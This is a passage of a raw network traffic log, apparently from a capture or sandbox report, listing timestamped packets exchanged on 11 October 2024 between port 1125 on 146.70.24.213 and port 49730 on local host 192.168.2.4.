Oct 11, 2024 16:53:46.986510992 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.986541986 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.986547947 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.986573935 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.986591101 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.986608028 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.986643076 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.986655951 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.986675024 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.986706018 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.986721992 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.986737967 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.986776114 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.986779928 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.986809015 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.986841917 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.986855030 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.989551067 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.989586115 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.989607096 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.989636898 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.989670038 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.989691019 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.989702940 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.989733934 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.989744902 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.989770889 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.989818096 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.990319014 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.990353107 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.990401983 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.990406990 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.990436077 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.990470886 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.990487099 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.990502119 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.990552902 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.990597963 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.990632057 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.990664959 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.990679979 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.990698099 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.990751982 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.990763903 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.990786076 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.990818024 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.990837097 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.990849972 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.990899086 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.990901947 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.990955114 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.990991116 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.991004944 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.991024971 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.991056919 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.991072893 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.991153002 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.991202116 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.991203070 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.991238117 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.991283894 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.991288900 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.991322994 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.991369963 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.991373062 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.991451979 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.991486073 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.991503000 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.991518974 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.991561890 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.991569042 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.991601944 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.991652966 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.991683960 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.991717100 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.991749048 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.991765022 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.991780996 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.991816044 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.991828918 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.991846085 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.991878033 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.991894007 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.991910934 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.991944075 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.991960049 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.991976976 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.992010117 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.992028952 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.992043018 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.992074966 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.992096901 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.992108107 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.992136955 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.992156029 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.992168903 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.992208004 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.992223978 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.992247105 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.992280006 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.992295980 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.992314100 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.992345095 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.992372990 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.992405891 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.992424965 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.992439032 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.992470026 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.992485046 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.992501974 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.992532969 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.992551088 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.992564917 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.992599010 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.992614031 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.998905897 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.998956919 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.999006033 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.999037981 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.999069929 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.999100924 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.999108076 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.999134064 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.999151945 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.999180079 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.999316931 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.999346018 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.999378920 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.999404907 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.999448061 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.999480963 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.999500036 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.999514103 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.999545097 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.999557972 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.999578953 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.999622107 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.000514984 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.000566006 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.000597954 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.000631094 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.000695944 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.000727892 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.000761032 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.000770092 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.000796080 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.000813007 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.054903984 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.123752117 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.123806953 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.123841047 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.123872042 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.123893976 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.123908043 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.123919964 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.123960972 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.124011040 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.124043941 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.124073982 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.124121904 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.124125957 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.124171972 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.124205112 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.124223948 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.124258041 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.124305964 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.124306917 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.124340057 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.124387026 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.124396086 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.124419928 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.124452114 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.124469042 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.124485016 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.124517918 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.124532938 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.124552965 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.124584913 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.124602079 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.124618053 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.124650002 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.124667883 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.124682903 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.124711037 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.124733925 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.124742985 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.124775887 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.124792099 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.124809027 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.124841928 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.124857903 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.124874115 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.124906063 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.124917984 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.124939919 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.124986887 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.125798941 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.125849962 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.125880957 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.125900030 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.125933886 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.125983000 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.125983000 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.126019001 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.126066923 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.126066923 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.126117945 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.126167059 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.126190901 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.126241922 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.126274109 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.126290083 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.126321077 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.126353025 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.126383066 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.126403093 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.126435995 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.126455069 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.126466990 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.126517057 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.126518965 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.126549959 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.126583099 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.126595974 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.126617908 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.126651049 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.126667023 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.126682043 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.126713991 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.126730919 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.126748085 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.126796961 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.126799107 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.126830101 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.126862049 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.126874924 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.126913071 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.126960039 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.126960993 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.126993895 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.127024889 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.127055883 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.127062082 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.127151012 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.127155066 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.127204895 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.127266884 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.127280951 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.127315044 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.127346992 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.127376080 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.127379894 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.127427101 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.127434015 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.127459049 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.127491951 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.127509117 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.127526045 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.127558947 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.127568960 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.127590895 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.127623081 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.127649069 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.127650023 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.127682924 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.127701044 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.127716064 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.127747059 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.127765894 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.127784967 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.127815962 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.127830982 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.127847910 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.127880096 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.127897978 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.127911091 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.127938986 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.127965927 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.127969980 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.128004074 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.128019094 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.128035069 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.128067970 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.128082037 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.128099918 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.128132105 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.128146887 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.128165007 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.128196001 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.128211021 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.128228903 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.128262997 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.128277063 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.128294945 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.128345966 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.128370047 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.128402948 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.128458977 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.130598068 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.130646944 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.130680084 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.130693913 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.130712986 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.130764961 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.130769014 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.130815029 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.130847931 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.130860090 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.130899906 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.130933046 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.130954981 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.130961895 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.130995035 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.131002903 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.131028891 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.131062031 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.131076097 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.131094933 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.131128073 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.131141901 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.131275892 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.131323099 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.131325006 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.131355047 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.131401062 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.131422997 CEST	1125	49730	146.70.24.213	192.168.2.4
